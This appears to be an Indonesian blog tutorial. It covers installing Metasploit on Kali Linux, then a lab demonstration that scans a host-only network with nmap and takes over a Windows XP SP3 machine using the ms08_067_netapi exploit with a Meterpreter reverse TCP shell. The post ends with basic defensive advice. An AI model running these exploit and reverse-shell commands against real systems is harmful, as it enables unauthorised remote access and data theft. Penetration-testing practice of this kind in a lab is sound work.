begini sudah klo baru install sistem operasi baru banyak aplikasi yang harus di install. hem..mungkin ini salah apliksi yang wajib ada di kompi saya? namanya metasploit. apa itu metasploit monggo baca disini.
untuk instalasinya sbb:
alat dan bahan yang di gunakan " masakan Kali "untuk instalasinya sbb:
- Buka terminal ketikan perintah di bawah ini :
wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run
untuk yang x64wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-x64-full.run
- Setelah download selesai ketikan perintah di bawah ini. ingat pastikan teman - teman sudah berada di directory hasil download tadi.
chmod +x framework-4.*-linux-full.run
- kemudian ketikan lagi di terminal
sudo ./framework-4.*-linux-full.run
maka akan tampil seperti gambar dibawah. saatnya melahap habis dengan menekan next.
- Ada lisensinya juga maklumlah gratisan gitu.
- Meletakan aplikasi jika sudah selesai terinstalasi,mau di taruh di mana ya terserah kawan kawan aje.saya ikut standarx aje.
- konfirmasi untuk update jika sudah selesai intalasi
- next lagi.
- next lagi
- Tunggu sampai proses instalasi selesai
- Instalasi selesai. tapi sampai tahapan ini,framework belum bisa digunakan
- untuk dapat menggunakan framework buka lagi terminal dan ketikan
sudo msfupdategambar diatas menunjukkan proses sedang berjalan. disini memerlukan waktu yang lumayan lama. sabar aje nunggunya.
- jika sudah selesai maka untuk menggunakan aplikasinya bisa mengetikan
msfconsole
- instalasi metasploit framework selesai. silahkan oprek - oprek dan mencari kelemahan system ya. jangan di gunakan buat iseng.
- metasploit framework
- nmap
- windows xp3
- oke jika semua sudah lengkap kita lakukan test untuk aplikasi ini.buka terminal:
- maka akan tampil di terminal seperti gambar dibawah.
- seperti gambar point nomor dua metasploit framework sudah dapat kita ujicoba. sekarang kita gunakan tool nmap untuk mengetahui host yang aktif dengan mengetikan : nmap -sP <alamat ip> contoh nmap -sP 192.168.1.* untuk gambar dibawah setelah melakukan analisa kita dapatkan beberapa ip yang aktif yang menjadi target saya adalah ip 192.168.56.101 dengan os yang sudah kita ketahui windows xp3.
- setelah itu kita dapat kita akan mencoba meng-exploit.ketikan perintah dibawah ini.
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set RHOST 192.168.56.101
exploit
sampai disini kita sudah dapat akses ke window xp3
- untuk mendapatkan akses system32 ketika dapat mengetikan perintah
execute -f cmd.exe -o
interact 1
- seperti gambar diatas kita sudah dapat mengakses windows.tanpa terjadi apa - apa pada di sistem windows seperti pada gambar
mungkin user awam tidak dapat mengetahui bahwa komputer sedang di serang atau tidak. sedikit cerita dari tutor diatas yang masih amburadul. untuk peningkatan keamanan yang lebih baik gunakan windows yang update misal ke windows 7. usahakan jika terkoneksi ke internet firewall selalu aktif. update antivirus berkala. walaupun dalam kasus yang sesungguhnya antivirus dan firewall yang aktif tidak akan bisa berfungsi apa - apa jika user menggunakan program bajakan yang tidak tahu program aplikasi tersebut aman atau tidak.
bisa kita bayangkan jika seseorang bisa mengakses system kita melalui backdoor mungkin mereka bisa saja mencuri dan mengambil data penting kita. tahap selanjutnya saya akan membahas bagaimana membuat sharing atau map network drive menggunakan command prompt.
mungkin sekian pemeberitahuan dari saya sekiranya jika ada yang ingin kita share silahkan tinggalkan komentar di bawah dan kita bahas bareng.
sumber : http://www.metasploit.com/
0 komentar:
Posting Komentar